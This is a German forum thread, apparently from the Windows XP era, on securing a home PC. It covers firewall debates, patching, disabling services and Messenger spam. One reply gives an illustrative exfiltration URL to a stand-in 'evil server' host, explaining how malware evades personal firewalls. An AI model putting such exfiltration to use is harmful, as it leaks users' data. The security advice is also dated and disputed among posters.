Eska: (OT): XP-Rechner sicher machen?

Hallo,
habe mir jetzt einen neuen Rechner zugelegt - leider mit XP home, war aber aus finanziellen Gründen nicht anders möglich (habe kein Geld, arbeitete auf einem Win 95 Rechner mit 16 MB Ram!! und dieser neue Rechner war einfach spottbillig).

Nachdem ich bisher der festen Überzeugung war, daß ich niemals XP benutzen werde, habe ich mich auch nicht weiter damit auseinander gesetzt, tja und nun steh ich da...

Daher die Frage was muß ich beachten um den Rechner möglichst sicher zu machen (bitte keine Tips ala "Mülltonne auf, Rechner rein, Mülltonne zu" - bin ich schon selber drauf gekommen ;-)

Bin dankbar, über jeden hilfreichen Vorschlag, Link, Suchbegriff (suche nach XP bringt ja leider nicht viel).

Vor allem wie stelle ich diese saudummen Popup Instant Messages aus (Hallo ich bin Susie und mach mich nackig..., etc.) - ich weiß absolute Anfängerfrage, aber ich steh da wirklich etwas auf dem Schlauch.

Schon mal Danke im vorraus,
ESKA

1. Alles gute Freeware:

Zone Alarm (Firewall)
    XP Antispy (nach Hause telefonieren verhindern)
    0190 Warner (Modedm/ISDN: Schutz vor Dialern)
    Ad-aware (entfernt Spyware)
    Browser Hijack Blaster (Schutz vor "Übernahme" des Browsers)
    SpamPal (gegen Spam)

Was noch fehlt: Virenscanner. Ein guter kostet natürlich was.

Gruß,
       Stefan

1. Hallo Stefan,

Was noch fehlt: Virenscanner. Ein guter kostet natürlich was.

Nicht zwangsläufig:

http://www.free-av.de/

Grüßle, lach

2. Erstmal danke
      Virenscanner von Norman war im Bundle mit dabei - taugt der was?

Kannst Du mir auch eine sichere Seite empfehlen, wo ich diese Programme runterladen kann, ohne daß ich mir damit genau Dialer oder Viren etc. einfange (habe gerade mal ein bisschen gegoogled - und bin dann immer wieder auf warnhinweise wie "achtung seite xy gehört nicht zu diesem Projekt und dort runtergeladene SOftware installiert dialer" gestossen - und das wäre natürlich schon extrem blöd, wenn ich mit der Software zum Schutz genau das Gegenteil bekomme.

Danke,
      ESKA

3. Moin,

Zone Alarm (Firewall)

Nein! Das ist Mist, bringt nichts und macht das System in der Regel instabil.

Nein. Das ist Mist, hat keinen Nutzen (alles sinnvollen Funktionen erreicht man über Bordmittel) und ist geradezu berüchtigt dafür das System unbrauchbar zu machen.

Bringt in der Regel nichts, wenn man als Administrator angemeldet ist

Jegliche Software kann auf einen unvertrauenswürdigen System nicht vertrauenswürdig funktionieren. Das gilt für Virenscanner und das gilt für Adaware. Wenn das System kompromittiert wurde (von nicht vertrauenswürdiger Software) muß es neu aufgesetzt werden.

Man kann auch einfach einen Browser benutzen, dessen Hersteller sich nicht der Lächerlichkeit preisgibt indem er verspricht 'nur' noch monatlich Patches rauszugeben, das dann aber nach Bekanntwerden einiger kritischer Lücken prompt nicht macht.

--
      Henryk Plötz
      Grüße aus Berlin
      ~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
      ~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~
      1. hi,

Nein. Das ist Mist, hat keinen Nutzen (alles sinnvollen Funktionen erreicht man über Bordmittel) und ist geradezu berüchtigt dafür das System unbrauchbar zu machen.

begründung bitte, besonders für letzteren teil der aussage.

gruss,
        wahsaga

1. Moin,

begründung bitte, besonders für letzteren teil der aussage.

Das 'nach Hause telefonieren verhindern' kann man wie gesagt mit Bordmitteln machen (da gibt es irgendwo unter Eigenschaften von System (IIRC) Ankreuzkästchen für) und ansonsten http://groups.google.com/groups?q=microsoft.public.de+antispy+problem, beispielhaft http://groups.google.com/groups?selm=bt66d0%243lsm6%241%40ID-4092.news.uni-berlin.de (ja, Michael Fischer weiss in der Regel worüber er redet; das kann man von manch anderem MVP leider nicht behaupten).

--
          Henryk Plötz
          Grüße aus Berlin
      2. Moin,

Zone Alarm (Firewall)

Bringt sehr wohl was!
        ZoneAlarm:
        "
        600377 Intrusions have been blocked since install
        6547 of those have been high-rated
        "

Weiterer Test bestätigte, dass sich mein Rechner komplett im "Stealth"-Modus befindet. Ports geschlossen. Unsichtbar im Internet.

Mein Windows ist 2003 kein einziges Mal abgestürzt.

Alles über Bordmittel verhindern? Das bestimmt nich!
        Und von dieser Berüchtigkeit habe ich nie gelesen.

Bringt in der Regel nichts, wenn man als Administrator angemeldet ist

Bin als Administrator angemeldet. Alle bisherigen drei Einwahlversuche von Dialern wurden geblockt.

Jegliche Software kann auf einen unvertrauenswürdigen System nicht vertrauenswürdig funktionieren. Das gilt für Virenscanner und das gilt für Adaware. Wenn das System kompromittiert wurde (von nicht vertrauenswürdiger Software) muß es neu aufgesetzt werden.

Dann lass es doch! Habe mir damit jedenfalls schon etliche Spyware vom Hals geschafft.

Man kann auch einfach einen Browser benutzen, dessen Hersteller sich nicht der Lächerlichkeit preisgibt indem er verspricht 'nur' noch monatlich Patches rauszugeben, das dann aber nach Bekanntwerden einiger kritischer Lücken prompt nicht macht.

Kann man. Aber vielleicht will er das nicht.

1. Moin,

Bringt sehr wohl was!

Jepp, es wiegt dich in wohliger Wärme und verhindert zuverlässig, dass du dich mit der Umwelt beschäftigst. So nebenbei erzeugt es noch ein paar sinnlose Logeinträge um dir auch ja zu versichern, daß du dich richtig entschieden hast.

Weiterer Test bestätigte, dass sich mein Rechner komplett im "Stealth"-Modus befindet. Ports geschlossen. Unsichtbar im Internet.

Nein, das ist eine Marketinglüge. Man kann einen Rechner nicht unsichtbar machen. Dein Rechner schreit lediglich in alle Welt hinaus, dass du eine Personal Firewall installiert und dich daher vermutlich nicht mit der Sicherheit deines Rechners beschäftigt hast. Ich habe den URL zum Linkblock bereits gepostet, dort findest du weitere Informationen, ich habe keine wirklich Lust dir das vorzulesen.

Mein Windows ist 2003 kein einziges Mal abgestürzt.

Ah, so einer bist du also.

Alles über Bordmittel verhindern? Das bestimmt nich!

Doch.

Und von dieser Berüchtigkeit habe ich nie gelesen.

Dann lies halt mal Usenet.

Bin als Administrator angemeldet. Alle bisherigen drei Einwahlversuche von Dialern wurden geblockt.

So, die Inkompetenz der Programmierer dieser Dialer ist kein Grund für die Funktionsfähigkeit der Software. Wenn du als Administrator angemeldet warst, sind die Dialer also auch als Administrator ausgeführt worden. Wie du sicher schon bemerkt hast, darfst du als Administrator quasi alles auf dem Computer machen. Programme die als Administrator ausgeführt werden, dürfen alles was du als Administrator darfst. Zähle 1 und 1 zusammen.
          Dein System muß als kompromittiert angesehen werden.

--
          Henryk Plötz
          Grüße aus Berlin
          1. So, die Inkompetenz der Programmierer dieser Dialer ist kein Grund für die Funktionsfähigkeit der Software. Wenn du als Administrator angemeldet warst, sind die Dialer also auch als Administrator ausgeführt worden. Wie du sicher schon bemerkt hast, darfst du als Administrator quasi alles auf dem Computer machen. Programme die als Administrator ausgeführt werden, dürfen alles was du als Administrator darfst. Zähle 1 und 1 zusammen.
            Dein System muß als kompromittiert angesehen werden.

Maaaaaamiii!!!!

2. hi,

Zone Alarm (Firewall)

Bringt sehr wohl was!
          ZoneAlarm:
          "
          600377 Intrusions have been blocked since install
          6547 of those have been high-rated
          "

mit dem anführen dieser "statistik" outest du dich gerade als extrem ahnungslos, was internet-kommunikation und die daraus resutlierenden nebeneffekte angeht.

auch hier nehme ich an, dass du nicht wirklich weisst, wo von du überhaupt redest.

gruss,
          wahsaga

2. Hi,

außer einer firewall und virenscanner natürlich noch die ganzen sicherheitspatches installieren und activeScripting deaktivieren und nur für "vertrauenswürdige" sites noch zulassen. auf diese weise bekommst du auch nebenbei ohne zusatzsoftware die popups weg...
    es gibt meiner kenntnis nach keine andere möglichkeit (außer hardwarelösungen vielleicht) den IE sicher zu bekommen. und man sieht ja, daß gerade in letzter zeit mehr ernsthafte sicherheitslöcher gefnden als gerpatched werden.

freundliche Grüße
    Ingo

1. Hallo Ingo,

außer einer firewall und virenscanner natürlich noch die ganzen sicherheitspatches installieren und activeScripting deaktivieren und nur für "vertrauenswürdige" sites noch zulassen.

Oder einen richtigen Browser verwenden. Ich glaube von Mozilla und Opera zum Beispiel gibt es auch Windows-Versionen.

auf diese weise bekommst du auch nebenbei ohne zusatzsoftware die popups weg...

Das glaube ich nicht. So wie ich Eska verstanden habe, meinte sie die Pop-Ups, die findige Spammer, über den standardmäßig aktivierten Windows-Nachrichtendienst verschicken.

freundliche Grüße

Ebenso freundliche Grüße,

Johannes

--
      ss:| zu:} ls:[ fo:} de:] va:} ch:) sh:( n4:| rl:( br:< js:| ie:{ fl:( mo:}
      http://www.zeller-johannes.de/
    2. Moin,

außer einer firewall und virenscanner

Das was hier unter 'firewall' verstanden wird bringt nichts.

natürlich noch die ganzen sicherheitspatches installieren

Starke Zustimmung. Aktuelle Windows-Rechner sollten wenigstens wöchentlich einmal nach Patches schauen.

und activeScripting deaktivieren und nur für "vertrauenswürdige" sites noch zulassen. auf diese weise bekommst du auch nebenbei ohne zusatzsoftware die popups weg...

Den IE schaltet man am besten ganz ab, indem man in den 'Internetoptionen' als Proxy 127.0.0.1 Port 9 einstellt. Dann _sollte_ der IE keine Verbindungen mehr aufbauen können.

--
      Henryk Plötz
      Grüße aus Berlin
      1. Hallo Henryk,

Das was hier unter 'firewall' verstanden wird bringt nichts.

was heist: "bringt nichts"?
        hat keinerlei wirkung?
        hat nicht die selbe wirkung, wie eine hardware-firewall?

wer kann sich denn privat sowas leisten?
        und auch trotz hardwarefirewall wurde schon in netze eingebrochen. "bringt" also auch "nichts" ?
        im auto den gurt anlegen und sich an die geschwindigkeitsbegrenzungen halten bringt übrigens auch nix.
        es sterben trotzdem leute bei unfällen. ;-)

freundl. Grüße aus Berlin, Raik

1. Moin,

was heist: "bringt nichts"?

Bringt nichts heisst bringt nichts. Einer "Personal Firewall" werden
          vom Marketing in der Regel 3 Funktionen zugeschrieben:

• soll vor Angriffen aus dem Internet schützen
             + Auf einem Rechner welcher keine Dienste in's Internet anbietet
               können auch keine Lücken in diesen Diensten angegriffen werden.
               Einfach alle Netzwerkdienste abstellen (Link habe ich gegeben)
               und schon ist die PFW unnötig. Schlimmer noch: Die PFW vergrößert
               die Codebasis und fügt Komplexität hinzu, jetzt könnten nicht nur
               Fehler im Betriebssystem sondern auch in der PFW für einen Angriff
               ausgenutzt werden. (Das ist bereits vorgekommen.)

• soll Programme am nach Hause telefonieren hindern
             + Das können sie nicht:
               a) die meisten PFWs fragen bei ausgehenden Verbindungen von
                  unbekannten Programmen den Benutzer was passieren soll,
                  diese Abfrage kann das bösartige Programm einfach selbst
                  beantworten (so schnell wie ein Programm klicken kann, kann
                  der Benutzer den Text gar nicht lesen);
               b) wenn nicht lassen sich die meisten PFWs mit den Rechten des
                  Benutzers umkonfigurieren (zumal der in der Regel als Admin
                  unterwegs ist), also kann auch ein bösartiges Programm mit
                  den Rechten des Benutzers die PFW einfach abschalten;
               c) selbst wenn a) oder b) nicht möglich sein sollten, kann man
                  beliebige Daten immer noch über beliebige andere Programme
                  tunnneln, wenn's gar nicht anders geht ruft die Schadsoftware
                  halt den Standardbrowser auf und lässt ihn
                  http://böserserver/cgi-bin/tunnel?rauszutunnelndeDaten abrufen.

• soll den Rechner unsichtbar machen
             + Das geht prinzipbedingt nicht. Normalerweise gibt ein Rechner
               auf Verbindungsanfragen (SYN) eine positive (SYN/ACK) oder
               eine negative Antwort (RST), wenn der Rechner nicht erreichbar/die
               Addresse nicht vergeben ist, sendet der letzte Router eine
               ICMP-Fehlermeldung raus. Eine PFW verletzt dieses Protokoll
               in der Regel absichtlich und schickt gar keine Antwort zurück.
               Da wie eben gesagt im Normalfall immer eine Antwort käme, teilt
               sie so mit: a) der Rechner ist da und b) der Rechner wird von
               einer Software 'geschützt' deren Autor TCP/IP nicht verstanden
               hat. Übrigens: Wenn keine Antwort kommt, muß der anfragende
               Rechner davon ausgehen, daß sein SYN oder die Antwort darauf
               unterwegs verlorengegangen sind und versucht seine Anfrage
               nochmal (in der Regel so um die 4 Wiederholungen), eine PFW sorgt
               also für mehr unnötigen Traffic.

hat keinerlei wirkung?

Och, Wirkungen gibt es schon, die sind aber allesamt nachteilig.

hat nicht die selbe wirkung, wie eine hardware-firewall?

Eine 'Hardware-Firewall' hätte wenigstens den Vorteil nicht vom
          aktuellen Benutzer und damit von von ihm ausgeführter Malware direkt
          konfigurierbar zu sein.

--
          Henryk Plötz
          Grüße aus Berlin
          1. Hallo Henryk,

ein dau schafft es auch, ein linux-system, ob nun mit oder ohne soft/hardwarefirewall unsicher zu konfigurieren.
            und wenn erst mal malware an bord ist, ist auch eine hardwarefirewall machtlos gegen "http://böserserver/cgi-bin/tunnel?rauszutunnelndeDaten".
            indem du vorschlägst, alle nicht benötigten dienste zu beenden, erwartest du genau das, was auch zum einrichten einer softwarefirewall nötig ist: fachwissen.
            letzten endes hängt die sicherheit eines systems immer vom wissen des users ab.
            und da privatanwender sich in der regel keinen administrator + hardwarefirewall leisten können und mit dem nötigen wissen über alle dienste/laufenden programme überfordert sein dürften, ist der weg über eine _gute_ pfw durchaus akzeptabel.
            wie gesagt: software, die einfach nur nachhause telefonieren will (z.b. prüfung der registrierung etc.), kann damit erfolgreich zum schweigen gebracht werden. und ein malware-programierer, der genügend kriminelle energie besitzt, entsprechende schutzmechanismen auszuhebeln, wird auch bei deaktivierten diensten und hardwarefirewall wege, wie den von dir beschriebenen finden, um daten nach aussen zu übertragen.

es ist anzunehmen, das ein programierer einer pfw zumindest mehr augenmerk auf solche sicherheitslücken seines programmes richtet, als etwa bei einem texteditor oder einem spiel.
            und selbst wenn eine pfw ein loch hat, muss der angreifer doch erst mal dieses finden und ausnutzen, bevor er dann auf eventuelle löcher der anwendungssoftware auf dem zielsystem zugreifen kann.

freundl. Grüße aus Berlin, Raik

3. hi,

sicherheitslücken in der calc.exe sind mir nicht bekannt.

(wir reden doch vom windows XP taschenrechner, oder?)

*scnr*,
    wahsaga

4. Hi,

habe mir jetzt einen neuen Rechner zugelegt - leider mit XP home, war aber aus finanziellen Gründen nicht anders möglich (habe kein Geld, arbeitete auf einem Win 95 Rechner mit 16 MB Ram!! und dieser neue Rechner war einfach spottbillig).

es war dir aus finanziellen Gründen nicht anders möglich? Was hättest Du denn gemacht, wenn Du Geld hättest? Für Heim- und Büroanwendungen spricht nichts gegen XP, da brauch man sich nicht schämen.

Daher die Frage was muß ich beachten um den Rechner möglichst sicher zu machen (bitte keine Tips ala "Mülltonne auf, Rechner rein, Mülltonne zu" - bin ich schon selber drauf gekommen ;-)

Willst Du jetzt eine Liste, anhand derer Du XP sicher machst? Vergiß es, die Zeit hat hier wohl kaum jemand.

Allgemene Informationen zur Sicherheit findest Du unter http://www.datenschutzzentrum.de/ bzw. http://www.datenschutzzentrum.de/systemdatenschutz/sysbiblio.htm. Das sind dort sehr interessante Broschüren.

Wie Du so einige Ports schließt kannst Du hier http://www.kssysteme.de/ nachlesen.

Das BSI hat auch so kleine allg. Tipps veröffentlicht. Da kann man auch ruhig mal reinschaun (http://www.bsi-fuer-buerger.de/).

Man kann ein System nicht sicher machen, Sicherheit muss man leben.
    Also Patches einspielen und die Software (AV) aktuell halten, dass ist dann schon fast die halbe Miete.
    Weiterhin möchte ich noch anmerken, dass Sicherheit viele Aspekte hat (Ausfallsicherheit, Verfügbarkeit etc.). Ich gehe davon aus, Du willst etwas über den Schutz von Daten gegenüber fremden Zugriffen wissen. Dann solltest Du nochmal nach "sichere Passwörter" oder "Sicherheitsrichtlinien" suchen.

Achso, hätte ich fast vergessen http://www.microsoft.com/germany/ms/windowscenter/tipps/security/ bzw. http://www.microsoft.com/germany/ms/security/default.mspx. Auf den MS-Seiten finden sich noch viele gute Artikel über Sicherheit und im WWW auch.

Ich persönlich deaktive noch alles was mit auto anfängt und nehme den Timeserver (Uhr in Taskleiste) raus. Das hat jetzt zwar nicht mit Sicherheit zu tun aber ich fühle mich dann einfach besser ;). Gibt da noch einige andere Sachen aber ich denke, dass das jetzt hier zu viel wird.

Ok, einen hab ich dann doch noch, administrative Freigaben sollten dauerhaft entfernt werden. Wie das geschieht findest Du im WWW.

hth
    bernd

5. Moin,

Deiner Beschreibung unten zufolge ist der Rechner eventuell bereits kompromittiert: Daher zuerst den Rechner neu aufsetzen, dann vorübergehend die 'Internetverbindungsfirewall' aktivieren, und das Windows-Update durchlaufen lassen und alle Patches installieren.

Ansonsten: Rechner sicher konfigurieren (also alle unnötigen Dienste abstellen, wenn du nicht weisst wofür du die brauchst sind alle Netzwerkdienste unnötig) und vor allem Nachdenken bevor du auf irgendetwas klickst. Die Wahrscheinlichkeit, dass die geile.tina@web.de dir wirklich ein Sicherheitsupdate von Microsoft schickt kannst du dir hoffentlich selber ausrechnen.

Wenn du die Netzwerkdienste korrekt konfiguriert (d.h. abgeschaltet hast) dann ist diese 'Internetverbindungsfirewall' auch unnötig und kann abgeschaltet werden, da sie gegen die TCP/IP-Standards verstößt.

Bin dankbar, über jeden hilfreichen Vorschlag, Link, Suchbegriff (suche nach XP bringt ja leider nicht viel).

Der Linkblock von de.comp.security.* und microsoft.public.de.security.* ist sehr lesenswert: http://www.linkblock.de/. Dort findest du Informationen zur generellen Unbrauchbarkeit von ZoneAlarm und Konsorten und Absicherung des Systems. Wenn du die unnötigen Dienste nicht manuell abstellen willst, findest du unter http://www.ntsvcfg.de/ ein Skript welches das für dich übernehmen kann.

--
    Henryk Plötz
    Grüße aus Berlin
  6. Sup!

... oder SE-Linux, oder alle Kabel abziehen ;-)

Gruesse,

Bio

--
    Gnade - was bedeutet dieses Wort?
  7. Nachdem ich bisher der festen Überzeugung war, daß ich niemals XP benutzen werde,

wieso eigentlich nicht? wenn man mal versucht die ganze windows gegen linux, mozilla gegen ie und alle gegen bill gates - diskussion sachlich zu betrachten, spricht meines erachtens nichts gegen xp. ich kann natürlich nur nach meinen erfahrungen gehen, die allerdings sind durchgehend positiv was xp pro betrifft.
    einige grundegeln solltest du allerdings schon beherzigen:

Vor allem wie stelle ich diese saudummen Popup Instant Messages aus (Hallo ich bin Susie und mach mich nackig..., etc.)

computerverwaltung->dienste und anwendungen->dienste->nachrichtendienst beenden und deaktivieren

im übrigen bin ich der meinung, wäre linux ein kommerzielles system und linus torwalds stünde genauso unter beschuss der gesamten hacker-gemeinde wie bill gates, wären in sämtlichen distributionen auch schon unzählige sicherheitslücken entdeckt worden.
    wenn man, wie gesagt, ein paar grundregeln beachtet und sich halbwegs vernünftig im netz bewegt stellt auch ein windows-system keine gefahr dar. ich bin ganz sicher kein microsoft-freund, ich halte z.b. outlook für eines der miesesten stücke software die jemals verbrochen wurden, wenn ichs mir recht überlege ist die komplette office-serie nicht viel besser... es ist aber nun mal eine tatsache dass sich ms-software zu einer art quasi-standard auf der ganzen erdkugel entwickelt hat und daher wird man überall darüber stolpern. man mag zwar im privaten bereich alles mit opensource-sw machen können, sofern man sich aber beruflich im it-umfeld bewegt kommt man an ms-produkten nicht vorbei, ob man das nun toll findet oder nicht.
    ich finde es nicht toll, bin aber aus genannten gründen dazu gezwungen, also hab ich notgedrungen meinen frieden mit redmond geschlossen. und kann mich bzgl. xp nicht beschweren.

grüsse aus berlin, volker

8. Hallo,
    danke erstmal für die vielen Tips - da habe ich ja was womit ich mich heute abend beschäftigen kann.
    Habe gestern erstmal Firewall (Outpost glaub ich), 0190Warner, etc. installiert (Virenscanner war ja schon drauf, und Update ist auch aktuell).
    Nur habe ich anscheinend die Firewall falsch eingestellt, da ich mich zwar noch ins Intenet einwählen kann, mir aber gar keine Seiten mehr angezeigt werden. - Daher hatte ich mich gestern abend auch nicht mehr gemeldet - das hier schreibe ich von der Arbeit aus...
    Welche Dienste darf man denn zulassen, und welche muß man blockieren?

Wie gesagt schonmal danke und bis bald,
    ESKA

1. Hallo ESKA,

Du brauchst definitiv keine Firewall (ja, ich weiß, auch ich habe sowas mal benutzt). Beende alle unnötigen Dienste und deaktiviere verschiedene Optionen in den Netzwerkeinstellungen (die Links findest du im Thread) schon hast du das, was dir die SW-Firewall verspricht, händisch erledigt. Ich weiß, dass das eine Menge Arbeit ist, aber es lohnt sich. Btw, die SW-Firewall (Norton Internet Security *rofl*) hatte mich im Sommer auch nicht vor den umgehenden Würmern geschützt, hätte ich damals mein System bereits von Hand konfiguriert, hätte das Würmchen keine Chance gehabt.

XP-Antispy ist ein meiner Meinung nach zumindest dafür gut, die Messengersoftware sauber aus dem System zu entfernen. Andere Optionen habe ich noch nicht genutzt, kann also nichts zu den weiteren Vor- oder Nachteilen dieser Software sagen.

Grüße
      Torsten